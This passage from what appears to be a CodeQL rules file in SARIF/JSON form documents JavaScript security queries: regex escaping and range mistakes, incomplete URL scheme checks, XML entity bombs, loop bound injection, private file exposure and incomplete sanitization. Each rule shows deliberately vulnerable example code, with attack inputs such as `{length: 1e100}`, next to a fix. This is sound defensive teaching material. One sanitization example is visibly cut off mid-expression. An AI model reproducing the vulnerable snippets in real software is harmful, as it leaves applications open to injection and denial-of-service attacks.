strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Prepending a backslash to an ordinary character in a string\n does not have any effect, and may make regular expressions constructed from this string\n behave unexpectedly.", - "id" : "js/useless-regexp-character-escape", - "kind" : "problem", - "name" : "Useless regular-expression character escape", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/overly-large-range", - "name" : "js/overly-large-range", - "shortDescription" : { - "text" : "Overly permissive regular expression range" - }, - "fullDescription" : { - "text" : "Overly permissive regular expression ranges match a wider range of characters than intended. This may allow an attacker to bypass a filter or sanitizer." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Overly permissive regular expression ranges match a wider range of characters than intended.\n This may allow an attacker to bypass a filter or sanitizer.", - "id" : "js/overly-large-range", - "kind" : "problem", - "name" : "Overly permissive regular expression range", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/incomplete-url-scheme-check", - "name" : "js/incomplete-url-scheme-check", - "shortDescription" : { - "text" : "Incomplete URL scheme check" - }, - "fullDescription" : { - "text" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\" and \"data:\" suggests a logic error or even a security vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n", - "markdown" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n" - }, - "properties" : { - "tags" : [ "security", "correctness", "external/cwe/cwe-020", "external/cwe/cwe-184" ], - "description" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\"\n and \"data:\" suggests a logic error or even a security vulnerability.", - "id" : "js/incomplete-url-scheme-check", - "kind" : "problem", - "name" : "Incomplete URL scheme check", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/xml-bomb", - "name" : "js/xml-bomb", - "shortDescription" : { - "text" : "XML internal entity expansion" - }, - "fullDescription" : { - "text" : "Parsing user input as an XML document with arbitrary internal entity expansion is vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-776", "external/cwe/cwe-400" ], - "description" : "Parsing user input as an XML document with arbitrary internal\n entity expansion is vulnerable to denial-of-service attacks.", - "id" : "js/xml-bomb", - "kind" : "path-problem", - "name" : "XML internal entity expansion", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/loop-bound-injection", - "name" : "js/loop-bound-injection", - "shortDescription" : { - "text" : "Loop bound injection" - }, - "fullDescription" : { - "text" : "Iterating over an object with a user-controlled .length property can cause indefinite looping." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", - "markdown" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-834", "external/cwe/cwe-730" ], - "description" : "Iterating over an object with a user-controlled .length\n property can cause indefinite looping.", - "id" : "js/loop-bound-injection", - "kind" : "path-problem", - "name" : "Loop bound injection", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/exposure-of-private-files", - "name" : "js/exposure-of-private-files", - "shortDescription" : { - "text" : "Exposure of private files" - }, - "fullDescription" : { - "text" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure of private information." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n", - "markdown" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-200", "external/cwe/cwe-219", "external/cwe/cwe-548" ], - "description" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure\n of private information.", - "id" : "js/exposure-of-private-files", - "kind" : "problem", - "name" : "Exposure of private files", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/incomplete-sanitization", - "name" : "js/incomplete-sanitization", - "shortDescription" : { - "text" : "Incomplete string escaping or encoding" - }, - "fullDescription" : { - "text" : "A string transformer that does not replace or escape all occurrences of a meta-character may be ineffective." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116" ], - "description" : "A string transformer that does not replace or escape all occurrences of a\n meta-character may be ineffective.", - "id" : "js/incomplete-sanitization", - "kind" : "problem", - "name" : "Incomplete string escaping or encoding", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/incomplete-multi-character-sanitization", - "name" : "js/incomplete-multi-character-sanitization", - "shortDescription" : { - "text" : "Incomplete multi-character sanitization" - }, - "fullDescription" : { - "text" : "A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: 